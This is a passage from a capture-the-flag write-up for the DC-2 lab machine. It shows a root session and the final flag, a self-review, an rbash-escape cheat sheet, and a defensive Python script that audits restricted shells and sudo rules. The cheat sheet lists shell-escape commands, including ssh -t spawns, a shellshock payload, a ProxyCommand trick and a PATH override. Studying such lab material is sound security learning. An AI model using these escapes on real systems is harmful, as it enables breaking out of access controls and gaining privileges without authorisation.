!/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:00:39:e2 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.124/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe00:39e2/64 scope link
valid_lft forever preferred_lft forever
# uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

Confirmed it's the target machine; finally, grab the flag.

# cd /root
# ls
final-flag.txt
# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| _ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Summary and Review

Because this box has hints, it wasn't that hard. Take building your own wordlist for the brute force: without the hint I might have been stuck for a long time, or tried to get in through a more recent WordPress vulnerability. This was also my first time meeting rbash; not hard, but it still ate a lot of time. Besides that, my sensitivity to username and password reuse is still not high enough, and I still lack my own approach to prioritising steps in a penetration test. Finally, I tried many kernel privilege-escalation methods on this box and none of them succeeded.

Addendum

rbash Bypass

In an rbash shell, the first thing to do is try the available commands to determine which are allowed and which are restricted; that makes bypassing rbash much easier. Below is a summary of bypass methods; the referenced articles are listed at the end.

Environment Reconnaissance

  • Check which commands are available
  • Check the operators >, >>, |
  • Check which programming-language interpreters are available
  • sudo -l to see which commands can be run as root
  • Look for SUID commands or files
  • echo $SHELL to confirm the shell in use
  • echo $PATH to check the PATH

Common Exploits

  • /bin/bash or /bin/sh
  • cp /bin/bash ./ or cp /bin/sh
  • ftp, gdb, less, vim: !/bin/bash or /bin/sh
  • Others: see GTFOBins for how to spawn a new bash from a given command
  • Spawn bash from a programming-language interpreter
  • ssh techniques
    • ssh username@IP -t "/bin/sh" or "/bin/bash"
    • ssh username@IP -t "bash --noprofile"
    • ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
    • ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
    • pico -s "/bin/bash" then you can write /bin/bash and then CTRL + T
  • Modify PATH directly: export PATH=$PATH:/bin/:/usr/bin:$PATH
  • Sometimes !sh also works
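As an added example (not code from the original write-up), here is a defender-side audit that applies the checklist above to the facts recorded earlier: the four commands in tom's rbash jail, his PATH, and jerry's sudo -l output. The SHELL_SPAWNERS set and the wording of the findings are assumptions; GTFOBins is the authoritative reference.

```python
"""Audit a restricted-shell setup for the escape routes used above.

Added example, not from the original write-up. It takes what the
checklist above collects, the commands reachable inside the jail, the
user's PATH and the text printed by `sudo -l`, and reports what lets a
user leave rbash or reach root. SHELL_SPAWNERS is an assumption here;
GTFOBins is the authoritative list.
"""
import re

# Programs with a built-in way to run another command (":shell", "!sh",
# a pager or editor). Names are the ones this write-up touched plus a few
# common ones; extend from GTFOBins.
SHELL_SPAWNERS = {"vi", "vim", "less", "more", "man", "git", "ftp", "gdb",
                  "pico", "nano", "python", "perl"}


def audit_jail(commands, path, user_home):
    """Findings for an rbash jail exposing `commands` through `path`."""
    findings = []
    for cmd in commands:
        if cmd in SHELL_SPAWNERS:
            findings.append(f"jail exposes {cmd}: can spawn an unrestricted shell")
    home = user_home.rstrip("/") + "/"
    for d in path.split(":"):
        if d.startswith(home):
            findings.append(f"PATH entry {d} lives under the user's home: "
                            "verify it is root-owned and not user-writable")
    return findings


# "(root) NOPASSWD: /usr/bin/git"  ->  runas / tags / command list
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output):
    """Parse the 'User X may run ...' block of `sudo -l` into rule dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if m is None:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": m.group("runas"), "tags": tags, "cmds": cmds})
    return rules


def audit_sudo(output):
    """Flag sudo rules whose target program can hand over a shell."""
    findings = []
    env_reset = "env_reset" in output.split("User ", 1)[0]
    for rule in parse_sudo_l(output):
        for cmd in rule["cmds"]:
            base = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd != "ALL" and base not in SHELL_SPAWNERS:
                continue
            how = "NOPASSWD" if "NOPASSWD" in rule["tags"] else "with password"
            findings.append(f"{cmd} as {rule['runas']} ({how}): yields a shell as {rule['runas']}")
            if base == "git" and env_reset:
                # env_reset only strips PAGER= from the command line; git still
                # starts its own pager, which is itself a shell spawner.
                findings.append("env_reset does not mitigate the git rule")
    return findings


# Jail contents and sudo -l output as recorded in the write-up above.
TOM_JAIL = (["less", "ls", "scp", "vi"], "/home/tom/usr/bin", "/home/tom")
JERRY_SUDO_L = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""
```

Run `audit_jail(*TOM_JAIL)` and `audit_sudo(JERRY_SUDO_L)` to reproduce the two weaknesses the write-up used; a jail limited to ls and scp, or a sudo rule for a non-interactive binary, returns no findings.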

DC-2 Target Machine
https://i3eg1nner.github.io/2023/07/4537b1f7b404.html
Author: I3eg1nner
Published on: July 10, 2023
License